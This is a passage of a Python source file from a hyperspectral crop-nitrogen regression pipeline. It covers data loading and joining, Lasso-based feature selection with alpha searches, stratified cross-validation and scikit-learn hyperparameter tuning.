This should be saved to the MSI data directory ''' fname_wells_18 = os.path.join(dir_data, 'wells_ground_data_2018.csv') fname_wells_19 = os.path.join(dir_data, 'wells_ground_data_2019.csv') fname_aerf_19 = os.path.join(dir_data, 'aerf_ground_data.csv') df1 = pd.read_csv(fname_wells_18) df2 = pd.read_csv(fname_wells_19) df3 = pd.read_csv(fname_aerf_19) col = ['study', 'date_image', 'plot_id', 'trt', 'rate_n_pp_kgha', 'rate_n_sd_plan_kgha', 'rate_n_total_kgha', 'growth_stage', y_label] # 'tissue_n_pct', 'biomass_kgha', 'nup_kgha'] df_wells1 = df1[pd.notnull(df1[y_label])][col].reset_index(drop=True) df_wells2 = df2[pd.notnull(df2[y_label])][col].reset_index(drop=True) df_aerf = df3[pd.notnull(df3[y_label])][col].reset_index(drop=True) df_ground = df_wells1.append(df_wells2).reset_index(drop=True) df_ground = df_ground.append(df_aerf).reset_index(drop=True) df_ground.insert(1, 'date', None) df_ground['date'] = df_ground['date_image'].apply(lambda value:value.replace('-','')) del df_ground['date_image'] return df_ground def get_spec_data(dir_data, row, feat='reflectance'): ''' Searches for hyperspectral .spec files; from here, can be loaed in for supervised regression or simply counted to be sure all expected files were processed Parameters: feat (``str``): must be either "reflectance" or "derivative", indicating which directory path to return. ''' panel_type = row['dir_panels'] crop_type = row['crop'] clip_type, _ = get_clip_type(row) smooth_type, _, _ = get_smooth_type(row) bin_type, _, _, _ = get_bin_type(row) segment_type, _, _, _, _, _, _ = get_segment_type(row) base_dir_spec = os.path.join(dir_data, panel_type, crop_type, clip_type, smooth_type, bin_type, segment_type, feat) return base_dir_spec def load_spec_data(dir_data, row, feat='reflectance'): ''' Loads the hyperspectral image data for supervised regression Must have the following meta columns: study, date, plot_id feat must be one of "reflectance" or "derivative". ''' base_dir_spec = get_spec_data(dir_data, row, feat) hsbatch = batch() df_spec = hsbatch.spectra_to_df( base_dir=base_dir_spec, search_ext='spec', dir_level=0) # multithread=multithread) df_spec = insert_date_study(df_spec) meta_bands = hsbatch.io.tools.meta_bands # dict to map band to wavelength bands = list(meta_bands.keys()) return df_spec, meta_bands, bands def load_preseg_stats(dir_data, row, bm_folder_name='bm_mcari2'): ''' For every "group" of processed images (all segmentation options), gather pre-segmentation statistics (e.g., MCARI2 10th percentile values). These pre-segmentation statistics can be included as additional features to the spectral dataset and model training/validation will be performed both with and without these features ''' panel_type = row['dir_panels'] crop_type = row['crop'] clip_type, _ = get_clip_type(row) smooth_type, _, _ = get_smooth_type(row) bin_type, _, _, _ = get_bin_type(row) segment_type, _, _, _, _, _, _ = get_segment_type(row) base_dir_bm = os.path.join(dir_data, panel_type, crop_type, clip_type, smooth_type, bin_type, bm_folder_name) stats_csv = bm_folder_name.replace('_', '-') + '-stats.csv' df_bm_stats = pd.read_csv(os.path.join(base_dir_bm, stats_csv)) df_bm_stats = insert_date_study(df_bm_stats) return df_bm_stats def insert_date_study(df): ''' Takes <df> and parses the 'fname' column to extract "study" and "date" info, then adds this as its own column before returning <df>. This is useful because we load the spectral data (via .spec files), which are essentially numpy arrays. 
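    For example, a hypothetical fname of
    'study_wells_date_20190723_plot_101-mean.spec' parses to study='wells'
    and date='20190723'.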
    Thus, we have to get study, date, and plot information via the filename
    so it can be inserted into the dataframe and joined to the ground truth
    data.
    '''
    df.insert(1, 'date', None)
    df.insert(1, 'study', None)
    df_temp = df.copy()
    for idx, spec in df_temp.iterrows():
        fname = spec['fname']
        study_str = 'study_'
        date_str = 'date_'
        plot_str = '_plot_'
        study = fname[fname.find(study_str)+len(study_str):fname.find(date_str)-1]
        date = fname[fname.find(date_str)+len(date_str):fname.find(plot_str)]
        df.loc[idx, 'study'] = study
        df.loc[idx, 'date'] = date
    return df

def join_ground_bm_spec(df_ground, df_bm_stats, df_spec,
                        on=['study', 'date', 'plot_id']):
    '''
    Joins data so it is available in a single dataframe. Before joining, each
    unique dataset will be given a "dataset_id" to help with stratified
    sampling later on
    '''
    df_ground_copy = df_ground.copy()
    df_ground_copy.insert(0, 'dataset_id', None)
    df_ground_copy['dataset_id'] = df_ground_copy.groupby(['study','date']).ngroup()
    df_join = df_ground_copy.merge(df_bm_stats, on=on)
    df_join = df_join.merge(df_spec, on=on)
    return df_join

def join_ground_spec(df_ground, df_spec, on=['study', 'date', 'plot_id']):
    '''
    Joins data so it is available in a single dataframe. Before joining, each
    unique dataset will be given a "dataset_id" to help with stratified
    sampling later on
    '''
    df_ground_copy = df_ground.copy()
    df_ground_copy.insert(0, 'dataset_id', None)
    df_ground_copy['dataset_id'] = df_ground_copy.groupby(['study','date']).ngroup()
    df_join = df_ground_copy.merge(df_spec, on=on)
    return df_join

def save_joined_df(dir_results, df_join, msi_run_id, grid_idx, y_label):
    '''
    Saves the joined dataframe to a new folder in ``dir_results``, alongside
    another README.txt file that provides some basic details about the
    processing that was performed in case the grid_idx gets messed up.
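    For example (hypothetical values), msi_run_id=4, grid_idx=12, and
    y_label='nup_kgha' write to
    <dir_results>/msi_4_012/nup_kgha/msi_4_012_nup_kgha_data.csv.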
grid_idx is the index of df_grid (this will change if df_grid changes, so that is why ``msi_run_id`` is also included in the folder name) ''' folder_name = 'msi_' + str(msi_run_id) + '_' + str(grid_idx).zfill(3) dir_out = os.path.join(dir_results, folder_name, y_label) pathlib.Path(dir_out).mkdir(parents=True, exist_ok=True) str1 = folder_name + '_' str2 = y_label fname_out = os.path.join(dir_out, str1 + str2 + '_data.csv') df_join.to_csv(fname_out, index=False) def create_readme(dir_results, msi_run_id, row): ''' Creates a README file that includes information about this run scenario (to be saved alongside the results files) ''' folder_name = 'msi_' + str(msi_run_id) + '_' + str(row.name).zfill(3) dir_out = os.path.join(dir_results, folder_name) pathlib.Path(dir_out).mkdir(parents=True, exist_ok=True) with open(os.path.join(dir_out, folder_name + '_README.txt'), 'w+') as f: f.write('MSI run ID: {0}\n'.format(msi_run_id)) f.write('Processing scenario ID: {0}\n\n'.format(row.name)) f.write('Panels type: {0}\n'.format(row['dir_panels'])) f.write('Crop type: {0}\n'.format(row['crop'])) f.write('Clip type: {0}\n'.format(row['clip'])) f.write('Smooth type: {0}\n'.format(row['smooth'])) f.write('Bin type: {0}\n'.format(row['bin'])) f.write('Segment type: {0}\n\n'.format(row['segment'])) def write_to_readme(msg, dir_results, msi_run_id, row): ''' Writes ``msg`` to the README.txt file ''' folder_name = 'msi_' + str(msi_run_id) + '_' + str(row.name).zfill(3) dir_out = os.path.join(dir_results, folder_name) with open(os.path.join(dir_out, folder_name + '_README.txt'), 'a') as f: f.write(str(msg) + '\n') def get_random_seed(dir_results, msi_run_id, row, seed=None): ''' Assign the random seed ''' if seed is None: seed = np.random.randint(0, 1e6) else: seed = int(seed) write_to_readme('Random seed: {0}'.format(seed), dir_results, msi_run_id, row) return seed # In[Training utility functions] def split_train_test(df, test_size=0.4, random_seed=None, stratify=None): ''' Splits ``df`` into train and test sets based on proportion indicated by ``test_size`` ''' df_train, df_test = train_test_split( df, test_size=test_size, random_state=random_seed, stratify=stratify) df_train = df_train.reset_index(drop=True) df_test = df_test.reset_index(drop=True) return df_train, df_test def get_repeated_stratified_kfold(df, n_splits=3, n_repeats=2, random_state=None): ''' Stratifies ``df`` by "dataset_id", and creates a repeated, stratified k-fold cross-validation object that can be used for any sk-learn model ''' X_null = np.zeros(len(df)) # not necessary for StratifiedKFold y_train_strat = df['dataset_id'].values rskf = RepeatedStratifiedKFold(n_splits=n_splits, n_repeats=n_repeats, random_state=random_state) cv_rep_strat = rskf.split(X_null, y_train_strat) return cv_rep_strat def check_stratified_proportions(df, cv_rep_strat): ''' Checks the proportions of the stratifications in the dataset and prints the number of observations in each stratified group ''' cols_meta = ['dataset_id', 'study', 'date', 'plot_id', 'trt', 'growth_stage'] # X_meta_train = df_train[cols_meta].values # X_meta_test = df_test[cols_meta].values X_meta = df[cols_meta].values print('Number of observations in each cross-validation dataset (key=ID; value=n):') train_list = [] val_list = [] for train_index, val_index in cv_rep_strat: X_meta_train_fold = X_meta[train_index] X_meta_val_fold = X_meta[val_index] X_train_dataset_id = X_meta_train_fold[:,0] train = {} val = {} for uid in np.unique(X_train_dataset_id): n1 = 
len(np.where(X_meta_train_fold[:,0] == uid)[0])
            n2 = len(np.where(X_meta_val_fold[:,0] == uid)[0])
            train[uid] = n1
            val[uid] = n2
        train_list.append(train)
        val_list.append(val)
    print('Train set:')
    for item in train_list:
        print(item)
    print('Test set:')
    for item in val_list:
        print(item)

def impute_missing_data(X, random_seed, method='iterative'):
    '''
    Imputes missing data in X - sk-learn models will not work with null data
    method should be one of "iterative" (takes more time) or "knn"
    '''
    # note: ``np.isnan(X).any() is False`` never holds because ``.any()``
    # returns a numpy bool, so test truthiness instead
    if not np.isnan(X).any():
        return X
    if method == 'iterative':
        imp = IterativeImputer(max_iter=10, random_state=random_seed)
    elif method == 'knn':
        imp = KNNImputer(n_neighbors=2, weights='uniform')
    X_out = imp.fit_transform(X)
    return X_out

def numeric_df_cols(df):
    '''
    Changes all numeric dataframe column headings to integer if they are
    strings. Caution: float-like strings will also be changed to integers.
    Useful because we want to access df columns by band number to make for
    convenient construction of the sk-learn X feature matrix
    '''
    df_out = df.copy()
    for c in df.columns:
        if isinstance(c, str) and c.isnumeric():
            df_out.rename(columns={c: int(c)}, inplace=True)
    return df_out

def get_X_and_y(df, bands, y_label, random_seed, key_or_val='keys',
                extra=None):
    '''
    Gets the X and y from df; y is determined by the ``y_label`` column

    ``key_or_val`` should be either "keys" (band info in keys of ``bands``)
    or "values" (band info in values of ``bands``)
    ``extra`` can be a string or a list of strings, but they should be column
    names in ``df`` (e.g., "pctl_10th")
    '''
    if isinstance(bands, dict):
        if key_or_val == 'keys':
            bands = sorted(list(bands.keys()))
        elif key_or_val == 'values':
            bands = sorted(list(bands.values()))
    if extra is None:
        extra = [None]
    if extra != [None]:
        if not isinstance(extra, list):
            extra = [extra]
        for col in extra:
            bands.append(col)
    X = df[bands].values
    y = df[y_label].values
    X = impute_missing_data(X, random_seed, method='iterative')
    return X, y

# In[Hyperparameter tuning functions]
def param_grid_add_key(param_grid_dict, key='regressor__'):
    '''
    Define tuning parameter grids for pipeline or transformed regressor
    key should either be "transformedtargetregressor__regressor__" for pipe
    key or "regressor__" for transformer key
    '''
    param_grid_mod = param_grid_dict.copy()
    for model in param_grid_dict:
        param_grid_mod[model] = {f'{key}{k}': v for k, v in
                                 param_grid_mod[model].items()}
    return param_grid_mod

@ignore_warnings(category=ConvergenceWarning)
def feat_selection_lasso(X, y, alpha, max_iter, random_seed):
    '''
    Feature selection via the Lasso algorithm
    '''
    model_las = Lasso(alpha=alpha, max_iter=max_iter, selection='cyclic',
                      random_state=random_seed).fit(X, y)
    model_bs = SelectFromModel(model_las, prefit=True)
    feats = model_bs.get_support(indices=True)
    coefs = model_las.coef_[feats]  # get ranking and save that too
    feat_ranking = rankdata(-coefs, method='min')
    X_select = model_bs.transform(X)
    return X_select, feats, feat_ranking

def f_lasso_feat_n(x, X1, y1, max_iter, random_seed):
    '''
    Uses the Lasso model to determine the number of features selected with a
    given x value (x represents the alpha hyperparameter of the Lasso model)
    '''
    if not isinstance(x, list):
        x = [x]
    feat_n_sel = []
    for alpha in x:
        model_las = Lasso(alpha=alpha, max_iter=max_iter, selection='cyclic',
                          random_state=random_seed).fit(X1, y1)
        model_bs = SelectFromModel(model_las, prefit=True)
        feats = model_bs.get_support(indices=True)
        feat_n_sel.append(len(feats))
    # note that zero features can be selected at large alpha values; we need
    # at least 1 feature, so callers must handle a count of 0
    if len(feat_n_sel) == 1:
        return feat_n_sel[0]
    else:
        return feat_n_sel

def f_lasso_feat_max(x, n_feats, X1, y1, max_iter, random_seed):
    '''
    Returns the difference between ``n_feats`` and the number of features
    selected at alpha = x (zero when they match)
    '''
    feat_n_sel = f_lasso_feat_n(x, X1, y1, max_iter, random_seed)
    print(feat_n_sel)
    der = n_feats - feat_n_sel  # difference between n_feats and selected (we want this to be 0 for convergence)
    print(der)
    return der

def setup_warning_catcher():
    """ Wrap warnings.showwarning with code that records warnings. """
    caught_warnings = []
    original_showwarning = warnings.showwarning

    def custom_showwarning(*args, **kwargs):
        caught_warnings.append(args[0])
        return original_showwarning(*args, **kwargs)

    warnings.showwarning = custom_showwarning
    return caught_warnings

def find_alpha_max(X1, y1, max_iter, random_seed):
    '''
    Finds the max alpha value for Lasso feature selection, which can be
    passed to Lasso to achieve a single (one) feature. This contrasts the
    minimum alpha that will achieve many features (up to 240 for Pika II
    hyperspectral data)
    '''
    feat_n_sel = f_lasso_feat_n(1, X1, y1, max_iter, random_seed)
    x = 0
    if feat_n_sel <= 1:  # alpha=1 already selects <= 1 feature; search upward from 0 in fine steps
        feat_n_sel = 2  # force entry into the while loop
        while feat_n_sel > 1:
            x += 0.01
            feat_n_sel = f_lasso_feat_n(x, X1, y1, max_iter, random_seed)
    else:  # the target is far away; search upward in coarse steps
        while feat_n_sel > 1:
            x += 1
            feat_n_sel = f_lasso_feat_n(x, X1, y1, max_iter, random_seed)
    # print('Iteration: {0}\nFeature n: {1}\n'.format(x, feat_n_sel))
    return x

def gradient_descent_step_pct_alpha_min(
        feat_n_sel, feat_n_last, n_feats, step_pct):
    '''
    Adjusts step_pct dynamically based on progress toward reaching n_feats.
    Ideally, step_pct should be large if we're a long way from n_feats, and
    much smaller if we're close to n_feats
    '''
    # find the relative distance covered in a single step
    n_feats_closer = feat_n_sel - feat_n_last
    pct_closer = n_feats_closer/n_feats
    pct_left = (n_feats-feat_n_sel)/n_feats
    # print(pct_closer)
    # print(pct_left)
    if pct_closer < 0.08 and pct_left > 0.5 and step_pct * 10 < 1:  # if we've gotten less than 8% of the way there
        print('Old "step_pct": {0}'.format(step_pct))
        step_pct *= 10
        print('New "step_pct": {0}'.format(step_pct))
    elif pct_closer < 0.15 and pct_left > 0.4 and step_pct * 5 < 1:  # if we've gotten less than 15% of the way there
        print('Old "step_pct": {0}'.format(step_pct))
        step_pct *= 5
        print('New "step_pct": {0}'.format(step_pct))
    elif pct_closer < 0.3 and pct_left > 0.3 and step_pct * 2 < 1:  # if we've gotten less than 30% of the way there
        print('Old "step_pct": {0}'.format(step_pct))
        step_pct *= 2
        print('New "step_pct": {0}'.format(step_pct))
    elif pct_closer > 0.1 and pct_left < pct_closer*1.3:  # if the last gain was at least ~77% of what is left, slow down a lot
        print('Old "step_pct": {0}'.format(step_pct))
        step_pct /= 5
        print('New "step_pct": {0}'.format(step_pct))
    elif pct_closer > 0.05 and pct_left < pct_closer*1.3:  # if the last gain was at least ~77% of what is left, slow down a bit
        print('Old "step_pct": {0}'.format(step_pct))
        step_pct /= 2
        print('New "step_pct": {0}'.format(step_pct))
    else:  # keep step_pct the same
        pass
    return step_pct

# @ignore_warnings(category=ConvergenceWarning)
def find_alpha_min(X1, y1, max_iter, random_seed, n_feats, alpha_init=1e-3,
                   step_pct=0.01, method='full', exit_on_stagnant_n=5):
    '''
    Finds the min alpha value for Lasso feature selection, which can be
    passed to Lasso to achieve many features.
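    The search decreases alpha multiplicatively (x *= 1 - step_pct) while
    fewer than ``n_feats`` features are selected, and backs off with a
    smaller step once it overshoots; gradient_descent_step_pct_alpha_min()
    rescales step_pct along the way.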
method: options: "convergence_warning": proceeds normally until a ConvergenceWarning is reached, then just stops there (using this method is making the decision that we will stop short of testing the full feature set, and will only try up to the number of features that first produces a ConvergenceWarning). This option makes features selection much faster, but does not look at all features. "full": proceeds until all features are represented (feature selection can be slow, but will look at all features). step_pct (``float``): indicates the percentage to adjust alpha by on each iteration. exit_on_stagnant_n (``int``): Will stop searching for minimum alpha value if number of selected features do not change after this many iterations. ''' msg = ('Leaving while loop before finding the alpha value that achieves ' 'selection of {0} feature(s) ({1} alpha value to use).\n') feat_n_sel = n_feats+1 # initialize to enter the while loop while feat_n_sel > n_feats: feat_n_sel = f_lasso_feat_n(alpha_init, X1, y1, max_iter, random_seed) alpha_init *= 10 # adjust alpha_init until we get a reasonable number of features x = alpha_init if method == 'convergence_warning': same_n = 0 caught_warnings_list = setup_warning_catcher() # will loop until warning or until all features are selected while len(caught_warnings_list) < 1: feat_n_last = feat_n_sel feat_n_sel = f_lasso_feat_n(x, X1, y1, max_iter, random_seed) same_n += 1 if feat_n_last == feat_n_sel else -same_n if same_n > exit_on_stagnant_n: print(msg.format(n_feats, 'minimum')) break if feat_n_sel < n_feats: step_pct = gradient_descent_step_pct_alpha_min( feat_n_sel, feat_n_last, n_feats, step_pct) x *= (1-step_pct) else: x *= 1+(step_pct/2) if feat_n_sel >= n_feats: # as soon as selected features meets or exceeds possible features, we're done break print('alpha: {0}'.format(x)) print('Features selected: {0}\n'.format(feat_n_sel)) elif method == 'full': same_n = 0 while feat_n_sel != n_feats: feat_n_last = feat_n_sel # print(x) feat_n_sel = f_lasso_feat_n(x, X1, y1, max_iter, random_seed) same_n += 1 if feat_n_last == feat_n_sel else -same_n if same_n > exit_on_stagnant_n: print(msg.format(n_feats, 'minimum')) break if feat_n_sel < n_feats: step_pct = gradient_descent_step_pct_alpha_min( feat_n_sel, feat_n_last, n_feats, step_pct) x *= (1-step_pct) else: # we went over; go back to prvious step, make much smaller, and adjust alpha down a bit x /= (1-step_pct) step_pct /= 10 x *= (1-step_pct) print('alpha: {0}'.format(x)) print('Features selected: {0}'.format(feat_n_sel)) print('Iterations without progress: {0}\n'.format(same_n)) print('Using up to {0} selected features\n'.format(feat_n_sel)) return x, step_pct def alpha_min_parallel_1(global_dict, lock, X1, y1, max_iter, random_seed, n_feats, exit_on_stagnant_n): with lock: # makes sure other workers don't change if global_dict['same_n'] > exit_on_stagnant_n or global_dict['feat_n_sel'] == n_feats: # print(msg.format(n_feats, 'minimum')) return global_dict['feat_n_last'] = global_dict['feat_n_sel'] # perhaps we have to have a global_dict_master and global_dict for each worker # as is, I don't think f_lasso_feat_n() will be executed in parallel..? 
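        # Because this entire body executes under ``with lock:``, only one
        # worker can be inside f_lasso_feat_n() at a time; the lock would
        # need to be narrowed to the shared-state reads/writes for the Lasso
        # fits themselves to overlap.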
global_dict['feat_n_sel'] = f_lasso_feat_n(global_dict['alpha'], X1, y1, max_iter, random_seed) global_dict['same_n'] += 1 if global_dict['feat_n_last'] == global_dict['feat_n_sel'] else -global_dict['same_n'] if global_dict['feat_n_sel'] < n_feats: global_dict['step_pct'] = gradient_descent_step_pct_alpha_min( global_dict['feat_n_sel'], global_dict['feat_n_last'], n_feats, global_dict['step_pct']) global_dict['alpha'] *= (1-global_dict['step_pct']) else: # we went over; go back to prvious step, make much smaller, and adjust alpha down a bit global_dict['alpha'] /= (1-global_dict['step_pct']) global_dict['step_pct'] /= 10 global_dict['alpha'] *= (1-global_dict['step_pct']) print('alpha: {0}'.format(global_dict['alpha'])) print('Features selected: {0}'.format(global_dict['feat_n_sel'])) print('Iterations without progress: {0}\n'.format(global_dict['same_n'])) def alpha_min_parallel(global_dict, w_dict, lock, X1, y1, max_iter, random_seed, n_feats, exit_on_stagnant_n): # with lock: # makes sure other workers don't change if global_dict['same_n'] > exit_on_stagnant_n or global_dict['feat_n_sel'] == n_feats: # print(msg.format(n_feats, 'minimum')) return w_dict w_dict['feat_n_last'] = w_dict['feat_n_sel'] # perhaps we have to have a w_dict_master and w_dict for each worker # as is, I don't think f_lasso_feat_n() will be executed in parallel..? w_dict['feat_n_sel'] = f_lasso_feat_n(w_dict['alpha'], X1, y1, max_iter, random_seed) if global_dict['feat_n_sel'] == n_feats: # another worker found alpha return w_dict if w_dict['feat_n_sel'] == n_feats: with lock: global_dict['step_pct'] = w_dict['step_pct'] global_dict['alpha'] = w_dict['alpha'] global_dict['feat_n_sel'] = w_dict['feat_n_sel'] return w_dict w_dict['same_n'] += 1 if w_dict['feat_n_last'] == w_dict['feat_n_sel'] else -w_dict['same_n'] if w_dict['feat_n_sel'] < n_feats: w_dict['step_pct'] = gradient_descent_step_pct_alpha_min( w_dict['feat_n_sel'], w_dict['feat_n_last'], n_feats, w_dict['step_pct']) w_dict['alpha'] *= (1-w_dict['step_pct']) else: # we went over; go back to prvious step, make much smaller, and adjust alpha down a bit w_dict['alpha'] /= (1-w_dict['step_pct']) w_dict['step_pct'] /= 10 w_dict['alpha'] *= (1-w_dict['step_pct']) print('alpha: {0}'.format(w_dict['alpha'])) print('Features selected: {0}'.format(w_dict['feat_n_sel'])) print('Iterations without progress: {0}\n'.format(w_dict['same_n'])) if global_dict['feat_n_sel'] == n_feats: # another worker found alpha return w_dict else: return w_dict # with lock: # just to update global_dict # global_dict['last_to_report'] = w_dict['worker_n'] # global_dict['same_n'] += 1 if w_dict['same_n'] > 0 and global_dict['feat_n_last'] == w_dict['feat_n_sel'] else -global_dict['same_n'] # if w_dict['feat_n_sel'] < n_feats: # global_dict['step_pct'] = w_dict['step_pct'] # global_dict['alpha'] = w_dict['alpha'] def find_alpha_min_pp(X1, y1, max_iter, random_seed, n_feats, n_jobs, alpha_init=1e-3, step_pct=0.01, exit_on_stagnant_n=5): msg = ('Leaving while loop before finding the alpha value that achieves ' 'selection of {0} feature(s) ({1} alpha value to use).\n') feat_n_sel = n_feats+1 # initialize to enter the while loop while feat_n_sel > n_feats: feat_n_sel = f_lasso_feat_n(alpha_init, X1, y1, max_iter, random_seed) alpha_init *= 10 # adjust alpha_init until we get a reasonable number of features N_WORKERS = os.cpu_count() with Manager() as manager: lock = manager.Lock() global_dict = manager.dict(alpha=alpha_init, feat_n_last=feat_n_sel, feat_n_sel=feat_n_sel, step_pct=step_pct, 
                                   same_n=0, fresh=True, last_to_report=0)
        pool = []  # guard: the while loop may not run if the initial alpha already selects n_feats
        while global_dict['feat_n_sel'] != n_feats:
            # Build a fresh state dict for each worker from the current
            # global state, stepping alpha down once per worker so the
            # workers probe different alpha values
            worker_dicts = []
            for i in range(N_WORKERS):
                w_dict = {  # make a copy of the current global state
                    'worker_n': i + 1,
                    'alpha': global_dict['alpha'],
                    'feat_n_last': global_dict['feat_n_last'],
                    'feat_n_sel': global_dict['feat_n_sel'],
                    'step_pct': global_dict['step_pct'],
                    'same_n': global_dict['same_n']}
                w_dict['step_pct'] = gradient_descent_step_pct_alpha_min(
                    w_dict['feat_n_sel'], w_dict['feat_n_last'],
                    n_feats, w_dict['step_pct'])
                w_dict['alpha'] *= (1 - w_dict['step_pct'])
                global_dict['step_pct'] = w_dict['step_pct']
                global_dict['alpha'] = w_dict['alpha']
                worker_dicts.append(w_dict)
            # pool = [Process(target=alpha_min_parallel, args=(global_dict, lock, X1, y1, max_iter, random_seed, n_feats, exit_on_stagnant_n))
            #         for _ in range(N_WORKERS)]
            pool = [Process(target=alpha_min_parallel,
                            args=(global_dict, w_dict, lock, X1, y1,
                                  max_iter, random_seed, n_feats,
                                  exit_on_stagnant_n))
                    for w_dict in worker_dicts]
            for p in pool:
                p.start()
            for p in pool:
                p.join()
                # p.close()
            if global_dict['same_n'] > exit_on_stagnant_n:
                print(msg.format(n_feats, 'minimum'))
                break
        alpha = global_dict['alpha']
        step_pct = global_dict['step_pct']
        feat_n_sel = global_dict['feat_n_sel']
        for p in pool:
            p.terminate()
            p.close()
            del p
        print('Alpha: {0}\nNumber of features: {1}'.format(
            global_dict['alpha'], global_dict['feat_n_sel']))
    print('Using up to {0} selected features\n'.format(feat_n_sel))
    return alpha, step_pct

def build_feat_selection_df(
        X1, y1, max_iter, random_seed, n_feats=None, n_linspace=200,
        method_alpha_min='full', alpha_init=1e-3, step_pct=0.01):
    '''
    Builds a dynamic list of all alpha values to try for feature selection,
    with the goal of covering the full range of features from 1 to all
    features (the max number of features varies by dataset).

    The ``start`` variable in this function probably needs to be adjusted,
    and really we have to come up with a better way to dynamically choose the
    start number.

    method_alpha_min:
        options:
            "convergence_warning": proceeds normally until a
                ConvergenceWarning is reached, then just stops there (using
                this method is making the decision that we will stop short of
                testing the full feature set, and will only try up to the
                number of features that first produces a ConvergenceWarning).
                This option makes feature selection much faster, but does not
                look at all features.
            "full": proceeds until all features are represented (feature
                selection can be slow, but will look at all features).
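
    Example (a sketch; shapes, seed, and data are hypothetical):
        >>> X1 = np.random.rand(100, 240)  # doctest: +SKIP
        >>> y1 = np.random.rand(100)  # doctest: +SKIP
        >>> alphas, alpha_min, step_pct = build_feat_selection_df(
        ...     X1, y1, max_iter=100000, random_seed=42)  # doctest: +SKIP
        >>> len(alphas)  # doctest: +SKIP
        200
    The returned list is log-spaced (base e) between alpha_min and alpha_max,
    so small and large feature counts are both well covered.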
''' msg = ('``method_alpha_min`` must be either "full" or' '"convergence_warning"') assert method_alpha_min in ["full", "convergence_warning"], msg if n_feats is None: n_feats = X1.shape[1] else: n_feats = int(n_feats) if n_feats > X1.shape[1]: n_feats = X1.shape[1] alpha_min, step_pct = find_alpha_min( X1, y1, max_iter, random_seed, n_feats, alpha_init=alpha_init, step_pct=step_pct, method=method_alpha_min, exit_on_stagnant_n=5) # alpha_min, step_pct = find_alpha_min_pp( # X1, y1, max_iter, random_seed, n_feats, alpha_init=alpha_init, # step_pct=step_pct, exit_on_stagnant_n=5) start = np.log(alpha_min) alpha_max = find_alpha_max(X1, y1, max_iter, random_seed) # pretty easy to find stop = np.log(alpha_max) logspace_list = list(np.logspace(start, stop, num=n_linspace, base=np.e)) return logspace_list, alpha_min, step_pct def filter_logspace_list(logspace_list, X1, y1, max_iter, random_seed): df = None for alpha in logspace_list: _, feats, feat_ranking = feat_selection_lasso( X1, y1, alpha, max_iter, random_seed) df_temp = pd.DataFrame(data=[[alpha, len(feats), tuple(feats), tuple(feat_ranking)]], columns=['alpha', 'n_feats', 'feats', 'feat_ranking']) if df is None: df = df_temp.copy() else: df = df.append(df_temp) return df # df = df.drop_duplicates(subset=['feats'], ignore_index=True) # logspace_list_filtered = list(df['alpha']) # return logspace_list_filtered def filter_logspace_list_pp(logspace_list, X1, y1, max_iter, random_seed, n_jobs): # m = Manager() # lock = m.Lock() chunks = chunk_by_n(logspace_list, n_jobs*2) if len(logspace_list) < n_jobs * 2: chunks = chunk_by_n(logspace_list, n_jobs) # print('Length of logspace_list: {0}'.format(len(logspace_list))) # print('Number of chunks: {0}'.format(len(chunks))) chunk_avg = sum([len(i) for i in chunks]) / len(chunks) # print('Average length of each chunk: {0:.1f}'.format(chunk_avg)) # print('Number of cores: {0}\n'.format(n_jobs)) df_all = None with ProcessPoolExecutor(max_workers=n_jobs) as executor: for df_feats in executor.map( filter_logspace_list, chunks, it.repeat(X1), it.repeat(y1), it.repeat(max_iter), it.repeat(random_seed)): # with lock: if df_all is None: df_all = df_feats.copy() else: df_all = df_all.append(df_feats) df_all = df_all.drop_duplicates(subset=['feats'], ignore_index=True) logspace_list_filtered = list(reversed(sorted(df_all['alpha']))) return logspace_list_filtered @ignore_warnings(category=ConvergenceWarning) def model_tuning(model, param_grid, standardize, scoring, refit, X_select, y, cv_rep_strat, n_jobs=1): ''' X_select represents the X matrix of only the selected features from lasso feature selection process On MSI, n_jobs should be a positive integer, otherwise CPUs will probably be incorrectly allocated. Because we're parrallelizing higher in the loop, we can just put this at 1 core (after all, we have to run GridSearchCV many times). ''' # model_svr = SVR(tol=1e-2) transformer = TransformedTargetRegressor( regressor=model, transformer=PowerTransformer( 'yeo-johnson', standardize=standardize)) clf = GridSearchCV(transformer, param_grid, n_jobs=n_jobs, cv=cv_rep_strat, return_train_score=True, scoring=scoring, refit=refit) # with ignore_warnings(category=ConvergenceWarning): clf.fit(X_select, y) df_tune = pd.DataFrame(clf.cv_results_) return df_tune, transformer def get_tuning_scores_multiple(feats, feat_ranking, alpha, df_tune, cols, scoring1='neg_mean_absolute_error', scoring2='neg_mean_squared_error', scoring3=None): ''' Retrieves training and validation scores to be inserted into the results dataframe. 
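    Only the grid-search row ranked first on ``scoring1`` (i.e.,
    rank_test_<scoring1> == 1) is used; train/validation means and standard
    deviations for each scoring metric are read from that row, along with
    its 'params' dict.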
''' rank_score = 'rank_test_' + scoring1 scoring_train = 'mean_train_' + scoring1 scoring_test = 'mean_test_' + scoring1 std_train = 'std_train_' + scoring1 std_test = 'std_test_' + scoring1 scoring2_train = 'mean_train_' + scoring2 scoring2_test = 'mean_test_' + scoring2 std2_train = 'std_train_' + scoring2 std2_test = 'std_test_' + scoring2 if scoring3 is not None: scoring3_train = 'mean_train_' + scoring3 scoring3_test = 'mean_test_' + scoring3 std3_train = 'std_train_' + scoring3 std3_test = 'std_test_' + scoring3 score_train = df_tune[df_tune[rank_score] == 1][scoring_train].values[0] std_train = df_tune[df_tune[rank_score] == 1][std_train].values[0] score_val = df_tune[df_tune[rank_score] == 1][scoring_test].values[0] std_val = df_tune[df_tune[rank_score] == 1][std_test].values[0] score2_train = df_tune[df_tune[rank_score] == 1][scoring2_train].values[0] std2_train = df_tune[df_tune[rank_score] == 1][std2_train].values[0] score2_val = df_tune[df_tune[rank_score] == 1][scoring2_test].values[0] std2_val = df_tune[df_tune[rank_score] == 1][std2_test].values[0] if scoring3 is not None: score3_train = df_tune[df_tune[rank_score] == 1][scoring3_train].values[0] std3_train = df_tune[df_tune[rank_score] == 1][std3_train].values[0] score3_val = df_tune[df_tune[rank_score] == 1][scoring3_test].values[0] std3_val = df_tune[df_tune[rank_score] == 1][std3_test].values[0] params = df_tune[df_tune[rank_score] == 1]['params'].values[0] if scoring3 is None: data = [len(feats), alpha, score_train, std_train, score_val, std_val, score2_train, std2_train, score2_val, std2_val, params, feats, feat_ranking] else: data = [len(feats), alpha, score_train, std_train, score_val, std_val, score2_train, std2_train, score2_val, std2_val, score3_train, std3_train, score3_val, std3_val, params, feats, feat_ranking] df_temp = pd.DataFrame(data=[data], columns=cols) # for key in df_temp['tune_params'].values[0].keys(): # print('{0}: {1}'.format(key, df_temp['tune_params'].values[0][key])) return df_temp def print_model(model): '''Simply prints the model type of ``model``''' if isinstance(model, Lasso): 